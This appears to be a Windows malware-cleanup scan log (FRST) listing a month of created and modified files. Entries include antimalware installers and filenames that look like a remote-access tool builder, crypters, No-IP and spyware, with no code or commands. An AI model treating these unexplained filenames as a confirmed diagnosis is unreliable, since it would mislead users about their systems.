C:\Users\TheGuest\Desktop\Passwords2014-09-15 18:39 - 2014-09-15 18:39 - 00189480 _____ () C:\Users\Victoria\Desktop\lol.rar2014-09-15 18:34 - 2014-09-15 18:34 - 00000000 ____D () C:\Users\TheGuest\Desktop\Settings2014-09-15 18:34 - 2014-09-15 18:34 - 00000000 ____D () C:\Users\TheGuest\Desktop\Plugins2014-09-15 18:33 - 2014-09-15 18:33 - 00085504 _____ () C:\Users\TheGuest\Desktop\PluginCompiler.exe2014-09-15 18:33 - 2014-09-15 18:33 - 00018432 _____ () C:\Users\TheGuest\Desktop\ServerPlugin.dll2014-09-15 18:33 - 2014-09-15 18:33 - 00016384 _____ () C:\Users\TheGuest\Desktop\ClientPlugin.dll2014-09-15 18:33 - 2014-09-15 18:33 - 00009216 _____ () C:\Users\TheGuest\Desktop\LZLoader.dll2014-09-15 18:33 - 2014-09-15 18:33 - 00000229 _____ () C:\Users\TheGuest\Desktop\Readme.txt2014-09-15 18:33 - 2014-09-15 18:33 - 00000030 _____ () C:\Users\TheGuest\Desktop\8C1A0000.log2014-09-15 18:33 - 2014-09-15 18:33 - 00000000 ____D () C:\Users\TheGuest\Desktop\Resources2014-09-15 18:30 - 2014-09-15 18:30 - 00000000 ____D () C:\Users\TheGuest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\No-IP DUC2014-09-15 18:30 - 2014-09-15 18:30 - 00000000 ____D () C:\Users\TheGuest\AppData\Local\Vitalwerks2014-09-15 18:29 - 2014-09-15 18:29 - 00000000 __SHD () C:\Users\TheGuest\AppData\Roaming\Eziriz2014-09-15 18:17 - 2014-09-15 18:17 - 00000000 ____D () C:\Users\TheGuest\AppData\Local\ESET2014-09-15 17:09 - 2014-09-15 17:09 - 00032512 _____ () C:\Windows\system32\Drivers\hitmanpro37.sys2014-09-15 16:00 - 2014-09-15 15:59 - 00000962 _____ () C:\Users\Victoria\Desktop\JRT.txt2014-09-15 15:34 - 2014-09-15 15:36 - 01373475 _____ () C:\Users\Victoria\Downloads\AdwCleaner (1).exe2014-09-15 15:10 - 2014-09-15 15:10 - 01016261 _____ (Thisisu) C:\Users\Victoria\Downloads\JRT (2).exe2014-09-15 14:23 - 2014-09-15 19:10 - 00003352 _____ () C:\Windows\System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-2698232268-2154043033-3228781758-10002014-09-15 14:23 - 2014-09-15 19:10 - 00003224 _____ () C:\Windows\System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-2698232268-2154043033-3228781758-10002014-09-15 14:15 - 2014-09-15 14:16 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\Victoria\Downloads\mbam-setup-2.0.2.1012 (2).exe2014-09-14 22:24 - 2014-09-14 22:27 - 00007986 _____ () C:\Users\Victoria\Documents\Uninstall Dragon Age Origins.log2014-09-14 13:49 - 2014-09-14 13:49 - 00000000 ____D () C:\Users\Victoria\AppData\Local\ESET2014-09-14 12:30 - 2014-09-14 20:27 - 00000000 ____D () C:\Users\Victoria\AppData\Roaming\Emnaky2014-09-14 12:27 - 2014-09-14 12:27 - 01696192 _____ (ESET) C:\Users\Victoria\Downloads\eset_nod32_antivirus_live_installer (2).exe2014-09-14 12:26 - 2014-09-14 12:27 - 01696192 _____ (ESET) C:\Users\Victoria\Downloads\eset_nod32_antivirus_live_installer (1).exe2014-09-14 12:25 - 2014-09-14 12:27 - 01696192 _____ (ESET) C:\Users\Victoria\Downloads\eset_nod32_antivirus_live_installer.exe2014-09-14 03:49 - 2014-09-14 03:49 - 00000000 ____D () C:\Program Files (x86)\ESET2014-09-14 03:37 - 2014-09-14 03:38 - 02347384 _____ (ESET) C:\Users\Victoria\Desktop\esetsmartinstaller_enu.exe2014-09-14 03:14 - 2014-09-15 17:07 - 00005074 _____ () C:\Windows\system32\.crusader2014-09-14 02:23 - 2014-09-15 17:06 - 00000000 ____D () C:\ProgramData\HitmanPro2014-09-14 02:23 - 2014-09-14 02:24 - 11194928 _____ (SurfRight B.V.) C:\Users\Victoria\Downloads\HitmanPro_x64.exe2014-09-14 02:22 - 2014-09-14 02:23 - 10280824 _____ (SurfRight B.V.) C:\Users\Victoria\Downloads\HitmanPro.exe2014-09-14 01:30 - 2014-09-14 01:30 - 01373475 _____ () C:\Users\Victoria\Downloads\AdwCleaner.exe2014-09-14 00:34 - 2014-09-14 00:35 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\Victoria\Downloads\mbam-setup-2.0.2.1012 (1).exe2014-09-14 00:15 - 2014-09-14 00:15 - 00321848 _____ (Malwarebytes Corporation) C:\Users\Victoria\Downloads\mbam-clean-2.1.1.1001.exe2014-09-13 20:46 - 2014-09-13 20:47 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\Victoria\Downloads\mbam-setup-2.0.2.1012.exe2014-09-13 19:33 - 2014-09-15 04:12 - 00000000 ____D () C:\Users\Victoria\Desktop\lol2014-09-13 18:51 - 2014-09-15 21:23 - 00000000 ____D () C:\Users\Victoria\Desktop\Bytes Protection2014-09-13 15:22 - 2014-09-13 15:22 - 01016261 _____ (Thisisu) C:\Users\Victoria\Downloads\JRT (1).exe2014-09-13 05:46 - 2014-09-13 05:46 - 00000000 ____D () C:\Users\Victoria\AppData\Roaming\Yxenpeb2014-09-13 01:38 - 2014-09-13 01:53 - 00000000 ____D () C:\Users\Victoria\Desktop\9000+ Icon Pack2014-09-13 00:58 - 2014-09-13 01:32 - 475068837 _____ () C:\Users\Victoria\Downloads\9000+ Icon Pack.rar2014-09-11 05:48 - 2014-09-11 05:48 - 16487046 _____ () C:\Users\Victoria\Downloads\Protect your Bytes.rar2014-09-10 18:29 - 2014-09-15 21:26 - 00000000 ____D () C:\Users\Victoria\Desktop\IM32014-09-10 16:46 - 2014-09-10 16:46 - 00007168 __RSH () C:\Users\Victoria\AppData\Roaming\{00007DD8-641C-73CB-7D97-6695673F7C6A}.exe2014-09-10 15:24 - 2014-09-10 15:24 - 00323696 _____ (Dropbox, Inc.) C:\Users\Victoria\Downloads\DropboxInstaller (3).exe2014-09-10 14:53 - 2014-09-10 14:53 - 01016261 _____ (Thisisu) C:\Users\Victoria\Downloads\JRT.exe2014-09-10 14:53 - 2014-09-10 14:53 - 00000000 ____D () C:\Windows\ERUNT2014-09-09 17:34 - 2014-09-09 17:34 - 00001168 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Express Burn Disc Burning Software.lnk2014-09-09 17:34 - 2014-09-09 17:34 - 00001112 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoPad Video Editor.lnk2014-09-09 17:33 - 2014-09-09 17:33 - 01563200 _____ (NCH Software) C:\Users\Victoria\Downloads\debutsetup.exe2014-09-09 17:33 - 2014-09-09 17:33 - 00001202 _____ () C:\Users\Public\Desktop\NCH Suite.lnk2014-09-09 17:33 - 2014-09-09 17:33 - 00001076 _____ () C:\Users\Public\Desktop\Debut Video Capture Software.lnk2014-09-09 16:10 - 2010-08-30 08:34 - 00536576 _____ (SQLite Development Team) C:\Windows\SysWOW64\sqlite3.dll2014-09-09 16:06 - 2014-09-15 16:06 - 00000000 ____D () C:\AdwCleaner2014-09-09 16:06 - 2014-09-09 16:06 - 01370467 _____ () C:\Users\Victoria\Downloads\adwcleaner_3.309.exe2014-09-07 17:41 - 2014-09-07 17:41 - 00000000 ____D () C:\Users\TheGuest\AppData\Roaming\WinRAR2014-09-07 17:40 - 2014-09-14 17:21 - 00000000 ____D () C:\Users\TheGuest\Desktop\BC2014-09-07 17:40 - 2014-09-07 17:40 - 00000000 ____D () C:\Users\TheGuest\AppData\Local\WinZip2014-09-07 17:38 - 2014-09-07 17:38 - 00000000 ____D () C:\Users\TheGuest\AppData\Roaming\Dell2014-09-07 17:37 - 2014-09-07 17:37 - 00087632 _____ () C:\Users\TheGuest\AppData\Local\GDIPFONTCACHEV1.DAT2014-09-07 17:37 - 2014-09-07 17:37 - 00000000 ____D () C:\Users\TheGuest\AppData\Roaming\DAEMON Tools Pro2014-09-07 17:37 - 2014-09-07 17:37 - 00000000 ____D () C:\Users\TheGuest\AppData\Roaming\ATI2014-09-07 17:37 - 2014-09-07 17:37 - 00000000 ____D () C:\Users\TheGuest\AppData\Roaming\Atheros2014-09-07 17:37 - 2014-09-07 17:37 - 00000000 ____D () C:\Users\TheGuest\AppData\Roaming\Apple Computer2014-09-07 17:37 - 2014-09-07 17:37 - 00000000 ____D () C:\Users\TheGuest\AppData\Local\Wondershare2014-09-07 17:37 - 2014-09-07 17:37 - 00000000 ____D () C:\Users\TheGuest\AppData\Local\Stardock_Corporation2014-09-07 17:37 - 2014-09-07 17:37 - 00000000 ____D () C:\Users\TheGuest\AppData\Local\ATI2014-09-07 17:37 - 2014-09-07 17:37 - 00000000 ____D () C:\Users\TheGuest\AppData\Local\antiphishing-vmninternethelper1_1dn2014-09-07 17:37 - 2014-09-07 17:37 - 00000000 ____D () C:\Users\TheGuest\AppData\Local\Adobe2014-09-07 17:36 - 2014-09-07 17:37 - 00000000 ____D () C:\Users\TheGuest\AppData\Roaming\Real2014-09-07 17:36 - 2014-09-07 17:37 - 00000000 ____D () C:\Users\TheGuest\AppData\Local\VirtualStore2014-09-07 17:36 - 2014-09-07 17:36 - 00001472 _____ () C:\Users\TheGuest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk2014-09-07 17:36 - 2014-09-07 17:36 - 00000000 ____D () C:\Users\TheGuest\AppData\Roaming\Adobe2014-09-07 17:36 - 2014-09-07 17:36 - 00000000 ____D () C:\Users\TheGuest\AppData\Local\Google2014-09-07 17:35 - 2014-09-15 18:07 - 00000000 ____D () C:\Users\TheGuest\AppData\Local\SoftThinks2014-09-07 17:35 - 2014-09-07 17:36 - 00000000 ____D () C:\Users\TheGuest2014-09-07 17:35 - 2014-09-07 17:35 - 00000020 ___SH () C:\Users\TheGuest\ntuser.ini2014-09-07 17:35 - 2014-04-17 03:21 - 00000000 ____D () C:\Users\TheGuest\AppData\Local\Microsoft Help2014-09-07 17:35 - 2013-05-18 08:51 - 00002066 _____ () C:\Users\TheGuest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft SkyDrive.lnk2014-09-07 17:35 - 2011-09-26 18:09 - 00000000 ____D () C:\Users\TheGuest\AppData\Local\Trusteer2014-09-07 17:35 - 2011-07-05 17:11 - 00000000 ____D () C:\Users\TheGuest\AppData\Roaming\Trusteer2014-09-07 17:35 - 2010-11-29 20:58 - 00000000 ____D () C:\Users\TheGuest\AppData\Roaming\Macromedia2014-09-07 17:35 - 2009-07-14 00:54 - 00000000 ___RD () C:\Users\TheGuest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories2014-09-07 17:35 - 2009-07-14 00:49 - 00000000 ___RD () C:\Users\TheGuest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance2014-09-07 13:39 - 2014-09-07 13:39 - 00000000 ____D () C:\Users\Victoria\Desktop\Settings2014-09-07 13:37 - 2014-09-10 21:18 - 00000467 _____ () C:\Users\Victoria\Desktop\8C1A0000.log2014-09-07 13:37 - 2014-09-07 13:37 - 00009216 _____ () C:\Users\Victoria\Desktop\LZLoader.dll2014-09-07 13:23 - 2014-09-15 19:54 - 00167374 _____ () C:\Windows\PFRO.log2014-09-06 18:02 - 2014-09-06 18:02 - 00018432 _____ () C:\Users\Victoria\Downloads\ServerPlugin.dll2014-09-06 18:02 - 2014-09-06 18:02 - 00000000 ____D () C:\Users\Victoria\Downloads\Plugins2014-09-06 18:01 - 2014-09-06 18:01 - 00016384 _____ () C:\Users\Victoria\Downloads\ClientPlugin.dll2014-09-06 15:02 - 2014-09-15 19:55 - 00000840 _____ () C:\Windows\setupact.log2014-09-06 15:02 - 2014-09-06 15:02 - 00000000 _____ () C:\Windows\setuperr.log2014-09-03 14:58 - 2014-09-03 14:58 - 00000286 _____ () C:\Windows\wininit.ini2014-09-02 21:58 - 2014-09-02 22:19 - 00000164 _____ () C:\Users\Victoria\Desktop\ss.txt2014-09-01 16:23 - 2014-09-01 16:33 - 00000008 _____ () C:\Users\Victoria\Desktop\settings.bin2014-09-01 16:22 - 2014-09-01 16:33 - 00004656 _____ () C:\Users\Victoria\Desktop\server.log2014-09-01 16:22 - 2014-09-01 16:25 - 00001103 _____ () C:\Users\Victoria\Desktop\builder.log2014-09-01 16:22 - 2014-09-01 16:23 - 00000112 _____ () C:\Users\Victoria\Desktop\plugins.bin2014-09-01 16:22 - 2014-09-01 16:22 - 00000048 _____ () C:\Users\Victoria\Desktop\public.bin2014-09-01 16:21 - 2014-09-07 13:38 - 00000000 ____D () C:\Users\Victoria\Desktop\Plugins2014-09-01 16:21 - 2014-09-01 16:33 - 00000000 ____D () C:\Users\Victoria\Desktop\Databases2014-09-01 16:20 - 2014-09-15 19:24 - 00000000 ____D () C:\Users\Victoria\Desktop\x862014-09-01 16:20 - 2014-09-07 13:37 - 00018432 _____ () C:\Users\Victoria\Desktop\ServerPlugin.dll2014-09-01 16:20 - 2014-09-07 13:37 - 00016384 _____ () C:\Users\Victoria\Desktop\ClientPlugin.dll2014-09-01 16:20 - 2014-09-07 13:37 - 00000000 ____D () C:\Users\Victoria\Desktop\Resources2014-09-01 16:20 - 2014-09-01 16:20 - 00262144 _____ (http://system.data.sqlite.org/) C:\Users\Victoria\Desktop\System.Data.SQLite.dll 2014-09-01 16:20 - 2014-09-01 16:20 - 00026197 _____ () C:\Users\Victoria\Desktop\ServerPlugin.xml2014-09-01 16:20 - 2014-09-01 16:20 - 00008366 _____ () C:\Users\Victoria\Desktop\ClientPlugin.xml2014-09-01 16:20 - 2014-09-01 16:20 - 00000028 _____ () C:\Users\Victoria\Desktop\E8250000.log2014-09-01 16:20 - 2014-09-01 16:20 - 00000000 ____D () C:\Users\Victoria\Desktop\x642014-09-01 15:32 - 2014-09-11 05:52 - 00000000 ____D () C:\Users\Victoria\Desktop\Data Protector V22014-08-31 19:24 - 2014-08-31 19:24 - 00000017 _____ () C:\Users\Victoria\Desktop\Password.txt2014-08-31 18:56 - 2014-08-31 18:59 - 08536806 _____ () C:\Users\Victoria\Desktop\download.mp42014-08-31 18:47 - 2014-08-31 18:47 - 00160789 _____ () C:\Users\Victoria\Downloads\n-west-w-1776.zip2014-08-31 17:37 - 2014-08-31 21:17 - 00000057 _____ () C:\Users\Victoria\Desktop\96380000.log2014-08-29 17:13 - 2014-08-29 17:13 - 00000000 __SHD () C:\Users\Victoria\AppData\Roaming\Eziriz2014-08-29 17:09 - 2014-08-29 17:09 - 00001530 _____ () C:\Users\Victoria\Desktop\info1.txt2014-08-29 15:29 - 2014-08-29 15:47 - 00409600 _____ () C:\database.mdb2014-08-29 15:29 - 2014-08-29 15:47 - 00000000 ____D () C:\Maps2014-08-29 15:28 - 2014-08-29 15:28 - 00000000 ____D () C:\Users\Victoria\AppData\Local\IsolatedStorage2014-08-29 14:53 - 2014-08-29 15:26 - 00000174 _____ () C:\Users\Victoria\Desktop\D4300000.log2014-08-26 10:34 - 2014-09-15 21:31 - 00000376 _____ () C:\Windows\Tasks\AVG-Secure-Search-Update_0814tb_rmv.job2014-08-26 10:34 - 2014-09-15 21:31 - 00000376 _____ () C:\Windows\Tasks\AVG-Secure-Search-Update_0814tb_rel.job2014-08-26 10:34 - 2014-08-26 10:34 - 00002670 _____ () C:\Windows\System32\Tasks\AVG-Secure-Search-Update_0814tb_rmv2014-08-26 10:34 - 2014-08-26 10:34 - 00002668 _____ () C:\Windows\System32\Tasks\AVG-Secure-Search-Update_0814tb_rel2014-08-26 10:34 - 2014-08-26 10:34 - 00000000 ____D () C:\ProgramData\Avg_Update_0814tb2014-08-25 19:09 - 2014-09-14 03:14 - 00000000 ____D () C:\Users\Victoria\Desktop\Icon2014-08-25 04:16 - 2014-08-25 04:16 - 00664064 _____ () C:\Users\Victoria\Downloads\VPN Installer (4).exe2014-08-16 18:50 - 2014-09-15 15:06 - 00000000 _RSHD () C:\Users\Victoria\247r33h ==================== One Month Modified Files and Folders ======= (If an entry is included in the fixlist, the file\folder will be moved.) 2014-09-15 21:49 - 2014-09-15 20:38 - 00000000 ____D () C:\Users\Victoria\Desktop\New folder (7)2014-09-15 21:49 - 2014-09-15 19:44 - 00000000 ____D () C:\FRST2014-09-15 21:44 - 2009-07-13 23:20 - 00000000 ____D () C:\Windows\tracing2014-09-15 21:37 - 2014-09-15 21:37 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage2014-09-15 21:34 - 2014-09-15 18:13 - 00000000 ____D () C:\Users\TheGuest\AppData\Roaming\uTorrent2014-09-15 21:32 - 2014-09-15 20:03 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys2014-09-15 21:32 - 2010-11-29 20:57 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job2014-09-15 21:31 - 2014-08-26 10:34 - 00000376 _____ () C:\Windows\Tasks\AVG-Secure-Search-Update_0814tb_rmv.job2014-09-15 21:31 - 2014-08-26 10:34 - 00000376 _____ () C:\Windows\Tasks\AVG-Secure-Search-Update_0814tb_rel.job2014-09-15 21:31 - 2010-11-18 19:14 - 00000000 ____D () C:\Program Files (x86)\Dell DataSafe Local Backup2014-09-15 21:26 - 2014-09-10 18:29 - 00000000 ____D () C:\Users\Victoria\Desktop\IM32014-09-15 21:23 - 2014-09-13 18:51 - 00000000 ____D () C:\Users\Victoria\Desktop\Bytes Protection2014-09-15 21:20 - 2012-04-11 21:38 - 00000000 ____D () C:\Program Files (x86)\Shop to Win 242014-09-15 21:19 - 2010-11-29 20:57 - 00000902 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job2014-09-15 21:03 - 2012-04-29 15:08 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job2014-09-15 20:58 - 2014-06-11 01:45 - 00000000 ____D () C:\Users\Victoria\Desktop\NetRevenue E-Book2014-09-15 20:47 - 2014-09-15 20:47 - 02105856 _____ (Farbar) C:\Users\Victoria\Downloads\FRST64 (2).exe2014-09-15 20:37 - 2014-09-15 19:45 - 00083374 _____ () C:\Users\Victoria\Downloads\FRST.txt2014-09-15 20:36 - 2014-09-15 20:36 - 02105856 _____ (Farbar) C:\Users\Victoria\Downloads\FRST64 (1).exe2014-09-15 20:22 - 2014-09-15 20:17 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy2014-09-15 20:20 - 2014-09-15 20:17 - 00000000 ____D () C:\Program Files (x86)\Spybot - Search & Destroy 22014-09-15 20:18 - 2014-09-15 20:18 - 00000000 ____D () C:\Windows\System32\Tasks\Safer-Networking2014-09-15 20:17 - 2014-09-15 20:17 - 00001357 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk2014-09-15 20:17 - 2014-09-15 20:17 - 00001345 _____ () C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk2014-09-15 20:17 - 2014-09-15 20:17 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 22014-09-15 20:16 - 2014-09-15 20:14 - 46525608 _____ (Safer-Networking Ltd. ) C:\Users\Victoria\Downloads\spybot-2.4.exe2014-09-15 20:16 - 2011-05-08 17:20 - 00000000 ____D () C:\Users\Victoria\AppData\Roaming\BitTorrent2014-09-15 20:09 - 2009-07-14 00:45 - 00014240 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A02014-09-15 20:09 - 2009-07-14 00:45 - 00014240 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A02014-09-15 20:03 - 2014-09-15 20:03 - 00001068 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk2014-09-15 20:03 - 2014-09-15 20:03 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware2014-09-15 20:03 - 2014-09-15 20:02 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware2014-09-15 20:02 - 2014-09-15 20:00 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\Victoria\Downloads\mbam-setup-2.0.2.1012 (3).exe2014-09-15 20:02 - 2012-05-04 16:45 - 00000000 ____D () C:\ProgramData\Malwarebytes2014-09-15 20:02 - 2009-07-14 01:10 - 01902294 _____ () C:\Windows\WindowsUpdate.log2014-09-15 19:58 - 2014-09-15 19:58 - 00003246 _____ () C:\Windows\System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-2698232268-2154043033-3228781758-10002014-09-15 19:57 - 2014-09-15 19:57 - 00003374 _____ () C:\Windows\System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-2698232268-2154043033-3228781758-10002014-09-15 19:55 - 2014-09-06 15:02 - 00000840 _____ () C:\Windows\setupact.log2014-09-15 19:55 - 2011-03-23 11:24 - 00065536 _____ () C:\Windows\system32\Ikeext.etl2014-09-15 19:55 - 2010-11-18 19:35 - 00000000 ____D () C:\Users\Default\AppData\Local\SoftThinks2014-09-15 19:55 - 2010-11-18 19:35 - 00000000 ____D () C:\Users\Default User\AppData\Local\SoftThinks2014-09-15 19:55 - 2009-07-14 01:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT2014-09-15 19:54 - 2014-09-07 13:23 - 00167374 _____ () C:\Windows\PFRO.log2014-09-15 19:44 - 2014-09-15 19:43 - 02105856 _____ (Farbar) C:\Users\Victoria\Downloads\FRST64.exe2014-09-15 19:29 - 2012-01-15 20:06 - 00000000 ____D () C:\Users\Victoria\AppData\Local\CrashDumps2014-09-15 19:24 - 2014-09-01 16:20 - 00000000 ____D () C:\Users\Victoria\Desktop\x862014-09-15 19:10 - 2014-09-15 14:23 - 00003352 _____ () C:\Windows\System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-2698232268-2154043033-3228781758-10002014-09-15 19:10 - 2014-09-15 14:23 - 00003224 _____ () C:\Windows\System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-2698232268-2154043033-3228781758-10002014-09-15 19:06 - 2014-09-15 19:06 - 00000000 ____D () C:\Users\TheGuest\Desktop\Passwords2014-09-15 18:39 - 2014-09-15 18:39 - 00189480 _____ () C:\Users\Victoria\Desktop\lol.rar2014-09-15 18:34 - 2014-09-15 18:34 - 00000000 ____D () C:\Users\TheGuest\Desktop\Settings2014-09-15 18:34 - 2014-09-15 18:34 - 00000000 ____D () C:\Users\TheGuest\Desktop\Plugins2014-09-15 18:33 - 2014-09-15 18:33 - 00085504 _____ () C:\Users\TheGuest\Desktop\PluginCompiler.exe2014-09-15 18:33 - 2014-09-15 18:33 - 00018432 _____ () C:\Users\TheGuest\Desktop\ServerPlugin.dll2014-09-15 18:33 - 2014-09-15 18:33 - 00016384 _____ () C:\Users\TheGuest\Desktop\ClientPlugin.dll2014-09-15 18:33 - 2014-09-15 18:33 - 00009216 _____ () C:\Users\TheGuest\Desktop\LZLoader.dll2014-09-15 18:33 - 2014-09-15 18:33 - 00000229 _____ () C:\Users\TheGuest\Desktop\Readme.txt2014-09-15 18:33 - 2014-09-15 18:33 - 00000030 _____ () C:\Users\TheGuest\Desktop\8C1A0000.log2014-09-15 18:33 - 2014-09-15 18:33 - 00000000 ____D () C:\Users\TheGuest\Desktop\Resources2014-09-15 18:30 - 2014-09-15 18:30 - 00000000 ____D () C:\Users\TheGuest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\No-IP DUC2014-09-15 18:30 - 2014-09-15 18:30 - 00000000 ____D () C:\Users\TheGuest\AppData\Local\Vitalwerks2014-09-15 18:30 - 2014-04-12 17:11 - 00000000 ____D () C:\Program Files (x86)\No-IP2014-09-15 18:29 - 2014-09-15 18:29 - 00000000 __SHD () C:\Users\TheGuest\AppData\Roaming\Eziriz2014-09-15 18:17 - 2014-09-15 18:17 - 00000000 ____D () C:\Users\TheGuest\AppData\Local\ESET2014-09-15 18:07 - 2014-09-07 17:35 - 00000000 ____D () C:\Users\TheGuest\AppData\Local\SoftThinks2014-09-15 17:09 - 2014-09-15 17:09 - 00032512 _____ () C:\Windows\system32\Drivers\hitmanpro37.sys2014-09-15 17:09 - 2010-11-29 20:22 - 00000000 ____D () C:\Users\Victoria2014-09-15 17:07 - 2014-09-14 03:14 - 00005074 _____ () C:\Windows\system32\.crusader2014-09-15 17:06 - 2014-09-14 02:23 - 00000000 ____D () C:\ProgramData\HitmanPro2014-09-15 16:06 - 2014-09-09 16:06 - 00000000 ____D () C:\AdwCleaner2014-09-15 16:00 - 2012-09-02 23:41 - 06098432 ___SH () C:\Users\Victoria\Downloads\Thumbs.db2014-09-15 15:59 - 2014-09-15 16:00 - 00000962 _____ () C:\Users\Victoria\Desktop\JRT.txt2014-09-15 15:36 - 2014-09-15 15:34 - 01373475 _____ () C:\Users\Victoria\Downloads\AdwCleaner (1).exe2014-09-15 15:17 - 2013-05-21 21:19 - 00003440 _____ () C:\Windows\System32\Tasks\PCDEventLauncherTask2014-09-15 15:10 - 2014-09-15 15:10 - 01016261 _____ (Thisisu) C:\Users\Victoria\Downloads\JRT (2).exe2014-09-15 15:06 - 2014-08-16 18:50 - 00000000 _RSHD () C:\Users\Victoria\247r33h2014-09-15 15:06 - 2014-08-12 17:28 - 00000000 _RSHD () C:\Users\Victoria\97b97kwoolvw82014-09-15 15:06 - 2014-08-11 17:47 - 00000000 _RSHD () C:\Users\Victoria\tn2t6v6dh6w2014-09-15 15:06 - 2014-07-27 19:17 - 00000000 _RSHD () C:\Users\Victoria\31ifp7kidvc8492014-09-15 15:06 - 2014-07-23 22:55 - 00000000 ____D () C:\Users\Victoria\mzs68wt9sws2014-09-15 15:06 - 2014-04-25 05:59 - 00000000 _RSHD () C:\Users\Victoria\ocrplg4mntz5jm2014-09-15 15:06 - 2012-04-11 23:54 - 00000000 ____D () C:\Program Files\PrivacySafeGuard2014-09-15 14:16 - 2014-09-15 14:15 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\Victoria\Downloads\mbam-setup-2.0.2.1012 (2).exe2014-09-15 04:12 - 2014-09-13 19:33 - 00000000 ____D () C:\Users\Victoria\Desktop\lol2014-09-15 02:00 - 2010-11-29 20:58 - 00000000 ____D () C:\Users\Victoria\AppData\Local\Adobe2014-09-15 00:36 - 2013-10-06 14:35 - 00001057 _____ () C:\Users\Victoria\AppData\Roaming\vso_ts_preview.xml2014-09-15 00:36 - 2013-10-05 16:21 - 00000000 ____D () C:\Users\Victoria\AppData\Roaming\Vso2014-09-15 00:29 - 2009-07-13 23:20 - 00000000 __RSD () C:\Windows\Media2014-09-14 22:29 - 2009-07-14 01:32 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games2014-09-14 22:28 - 2013-01-10 12:53 - 00000000 ____D () C:\Users\Victoria\Documents\WB Games2014-09-14 22:27 - 2014-09-14 22:24 - 00007986 _____ () C:\Users\Victoria\Documents\Uninstall Dragon Age Origins.log2014-09-14 22:27 - 2014-03-21 17:22 - 00000000 ____D () C:\ProgramData\BioWare2014-09-14 22:27 - 2012-11-30 11:52 - 00000000 ____D () C:\Users\Victoria\Documents\BioWare2014-09-14 22:12 - 2014-01-20 19:20 - 00000000 ____D () C:\Users\Victoria\AppData\Roaming\vlc2014-09-14 20:27 - 2014-09-14 12:30 - 00000000 ____D () C:\Users\Victoria\AppData\Roaming\Emnaky2014-09-14 19:35 - 2014-05-11 22:27 - 00000000 _RSHD () C:\Users\Victoria\r41uo3t17357842014-09-14 18:27 - 2014-06-30 16:00 - 00000000 ____D () C:\Users\Victoria\Desktop\sddfjsd2014-09-14 18:26 - 2014-08-06 18:09 - 00000000 ____D () C:\Users\Victoria\Desktop\DataScrambler2014-09-14 18:26 - 2014-06-30 20:47 - 00000000 ____D () C:\Users\Victoria\Desktop\dc2014-09-14 18:26 - 2014-02-01 14:43 - 00000000 ____D () C:\Users\Victoria\Desktop\squid2014-09-14 17:21 - 2014-09-07 17:40 - 00000000 ____D () C:\Users\TheGuest\Desktop\BC2014-09-14 17:21 - 2014-05-07 23:16 - 00000000 _RSHD () C:\Users\Victoria\9r697hv2014-09-14 13:49 - 2014-09-14 13:49 - 00000000 ____D () C:\Users\Victoria\AppData\Local\ESET2014-09-14 12:40 - 2011-10-19 22:52 - 00001945 _____ () C:\Windows\epplauncher.mif2014-09-14 12:27 - 2014-09-14 12:27 - 01696192 _____ (ESET) C:\Users\Victoria\Downloads\eset_nod32_antivirus_live_installer (2).exe2014-09-14 12:27 - 2014-09-14 12:26 - 01696192 _____ (ESET) C:\Users\Victoria\Downloads\eset_nod32_antivirus_live_installer (1).exe2014-09-14 12:27 - 2014-09-14 12:25 - 01696192 _____ (ESET) C:\Users\Victoria\Downloads\eset_nod32_antivirus_live_installer.exe2014-09-14 03:49 - 2014-09-14 03:49 - 00000000 ____D () C:\Program Files (x86)\ESET2014-09-14 03:38 - 2014-09-14 03:37 - 02347384 _____ (ESET) C:\Users\Victoria\Desktop\esetsmartinstaller_enu.exe2014-09-14 03:18 - 2010-11-29 20:25 - 00000000 ____D () C:\Users\Victoria\AppData\Local\ATI2014-09-14 03:14 - 2014-08-25 19:09 - 00000000 ____D () C:\Users\Victoria\Desktop\Icon2014-09-14 03:14 - 2014-01-18 01:34 - 00000000 ____D () C:\Users\Victoria\Desktop\IPS v1.02014-09-14 03:13 - 2014-01-15 22:01 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spytech SpyAgent2014-09-14 03:13 - 2013-05-13 20:30 - 00000000 ____D () 